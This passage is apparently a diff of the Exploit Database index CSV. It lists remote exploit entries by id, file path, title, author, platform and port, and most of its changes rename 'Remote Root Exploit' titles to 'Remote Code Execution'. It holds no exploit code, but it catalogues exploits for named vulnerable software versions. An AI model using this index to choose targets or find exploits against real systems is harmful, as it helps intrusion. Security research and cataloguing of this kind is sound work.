2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808 -620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String",2004-11-09,"Carlos Barros",linux,remote,25 +620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",linux,remote,25 621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23 623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,windows,remote,21 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143 @@ -8911,7 +8915,7 @@ id,file,description,date,author,platform,type,port 668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143 670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 -681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String",2004-12-12,CoKi,linux,remote,504 +681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,linux,remote,504 689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,multiple,remote,0 693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21 705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000 @@ -8952,7 +8956,7 @@ id,file,description,date,author,platform,type,port 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21 -828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 +828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",multiple,remote,617 829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Exploit",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803 @@ -8965,8 +8969,8 @@ id,file,description,date,author,platform,type,port 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 -900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow",2005-03-28,infamous41md,linux,remote,25 -902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 +900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 +902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42 @@ -8991,7 +8995,7 @@ id,file,description,date,author,platform,type,port 976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0 -981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String",2005-05-05,cybertronic,linux,remote,25 +981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25 986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",windows,remote,0 987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0 990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,windows,remote,20031 @@ -9016,7 +9020,7 @@ id,file,description,date,author,platform,type,port 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0 1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143 -1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 +1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Exploiter Tool",2005-08-03,cybertronic,windows,remote,6070 @@ -9066,7 +9070,7 @@ id,file,description,date,author,platform,type,port 1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 -1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 +1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21 1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 1330,platforms/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21 @@ -9171,7 +9175,7 @@ id,file,description,date,author,platform,type,port 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 -2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110 +2258,platforms/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow",2006-08-26,muts,windows,remote,110 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote,0 2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 @@ -9226,11 +9230,11 @@ id,file,description,date,author,platform,type,port 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2887,platforms/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - (Long Filename) Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 -2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 +2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 -3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 +3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 @@ -9318,7 +9322,7 @@ id,file,description,date,author,platform,type,port 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0 -3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53 +3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53 3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143 3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0 @@ -9331,7 +9335,7 @@ id,file,description,date,author,platform,type,port 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21 3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80 -3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 +3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0 3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0 @@ -9358,7 +9362,7 @@ id,file,description,date,author,platform,type,port 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0 -3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 +3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113 3927,platforms/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote,0 3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote,0 @@ -9588,19 +9592,19 @@ id,file,description,date,author,platform,type,port 5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0 5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 -5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 +5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,linux,remote,0 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0 -5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143 +5248,platforms/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143 5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0 5269,platforms/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 -5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 +5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 -5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0 +5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 @@ -9608,7 +9612,7 @@ id,file,description,date,author,platform,type,port 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0 5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510 -5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit)",2008-04-04,I)ruid,solaris,remote,0 +5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 @@ -9652,7 +9656,7 @@ id,file,description,date,author,platform,type,port 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 -6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 +6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 @@ -9713,7 +9717,7 @@ id,file,description,date,author,platform,type,port 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 -6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 +6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Code Execution",2008-10-19,kingcope,solaris,remote,111 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 @@ -10125,11 +10129,11 @@ id,file,description,date,author,platform,type,port 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 -11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0 +11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0 11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0 11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0 11694,platforms/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote,0 -11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 +11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21 @@ -10232,7 +10236,7 @@ id,file,description,date,author,platform,type,port 14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0 14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 -14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure",2010-07-18,kingcope,aix,remote,0 +14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,aix,remote,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0 14447,platforms/windows/remote/14447.html,"Multiple Web Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0 @@ -10263,7 +10267,7 @@ id,file,description,date,author,platform,type,port 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0 -14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0 +14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 @@ -10327,7 +10331,7 @@ id,file,description,date,author,platform,type,port 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0 15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,windows,remote,0 15658,platforms/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0 -15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 +15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution",2010-12-02,anonymous,linux,remote,21 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15668,platforms/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0 @@ -10388,7 +10392,7 @@ id,file,description,date,author,platform,type,port 16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0 16259,platforms/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0 -16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0 +16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",hardware,remote,0 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 @@ -10583,7 +10587,7 @@ id,file,description,date,author,platform,type,port 16479,platforms/windows/remote/16479.rb,"IPSwitch IMail 